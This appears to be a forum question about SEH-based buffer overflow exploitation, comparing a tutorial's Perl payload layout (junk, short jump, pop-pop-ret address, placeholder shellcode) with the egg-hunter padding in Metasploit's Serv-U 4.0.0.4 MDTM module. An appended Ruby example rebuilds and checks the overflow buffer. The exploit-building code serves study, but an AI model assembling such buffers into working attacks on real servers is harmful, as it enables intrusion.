windows/ftp/servu_mdtm is an exploit for Serv-U 4.0.0.4, and it works. I recently read moonife's translation of the Exploit Writing series and noticed that this module is an SEH-based exploit, but its padding differs somewhat from what the translated material describes. Can anyone explain?
In the tutorial the layout is [Junk][next SEH][SEH][Shellcode], as shown below; its
my $junk = "A" x 584;
my $nextSEHoverwrite = "\xeb\x06\x90\x90"; #breakpoint
my $SEHoverwrite = pack('V',0x1001E812); #pop pop ret from player.dll
my $shellcode = "1ABCDEFGHIJKLM2ABCDEFGHIJKLM3ABCDEFGHIJKLM";
my $junk2 = "\x90" x 1000;
my $payload = $junk . $nextSEHoverwrite . $SEHoverwrite . $junk2;
In servu_mdtm the padding is more complicated:
search_rtag = "\x34\x33\x32\x31" # +1 / 0 / -1 [start, end, stored]
search_stub = Rex::Arch::X86.searcher(search_rtag)
search_code = "\x83\xc4\xfc\x5f" + search_stub + 'BB'
if (datastore['SEHOffset'] < search_code.length)
    print_error("Not enough room for search code, adjust SEHOffset")
    return
end
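As an added example (not part of the original post, and not code from the tutorial or from the Metasploit module), the following Ruby lays out the tutorial's [Junk][next SEH][SEH][...] buffer, decodes the short jump stored in the next-SEH slot to show which buffer offset it lands on, and reproduces the module's SEHOffset-versus-search-code size check. The offset 584 and the handler address 0x1001E812 are taken from the post; the trailing bytes are constructed filler.

```ruby
# Added example: SEH layout checker. Values are taken from the post or constructed.

# Build the buffer: junk up to the SEH record, a 4-byte "next SEH" slot holding
# a short jump, the 4-byte handler address, then whatever follows the record.
def build_seh_layout(seh_offset:, handler_addr:, after_seh:)
  junk = ("A" * seh_offset).b
  nseh = "\xeb\x06\x90\x90".b          # jmp short +6, padded with two nops
  seh  = [handler_addr].pack("V")      # little-endian 32-bit handler address
  {
    buffer: junk + nseh + seh + after_seh.b,
    nseh_at: seh_offset,               # offset of the next-SEH slot
    seh_at: seh_offset + 4,            # offset of the handler address
    after_seh_at: seh_offset + 8,      # first byte after the SEH record
  }
end

# Decode the 2-byte short jump (EB rel8) in the next-SEH slot and return the
# buffer offset execution continues at. rel8 is relative to the end of the
# 2-byte instruction, so the target is nseh_at + 2 + rel8.
def short_jump_target(buffer, nseh_at)
  opcode, rel8 = buffer[nseh_at, 2].unpack("Cc")
  raise "next-SEH slot does not start with a short jmp" unless opcode == 0xEB
  nseh_at + 2 + rel8
end

# Same guard as the module: the search code has to fit within SEHOffset bytes.
def search_code_fits?(seh_offset, search_code)
  seh_offset >= search_code.bytesize
end

layout = build_seh_layout(seh_offset: 584, handler_addr: 0x1001E812,
                          after_seh: "\x90" * 16)
target = short_jump_target(layout[:buffer], layout[:nseh_at])
puts "jmp short lands at offset #{target}, record ends at #{layout[:after_seh_at]}"
```

Running it shows the +6 jump skips exactly the two nops and the 4-byte handler address, which is why the tutorial can place its payload right after the SEH record, whereas the module instead places a searcher stub that locates the tagged payload elsewhere in memory.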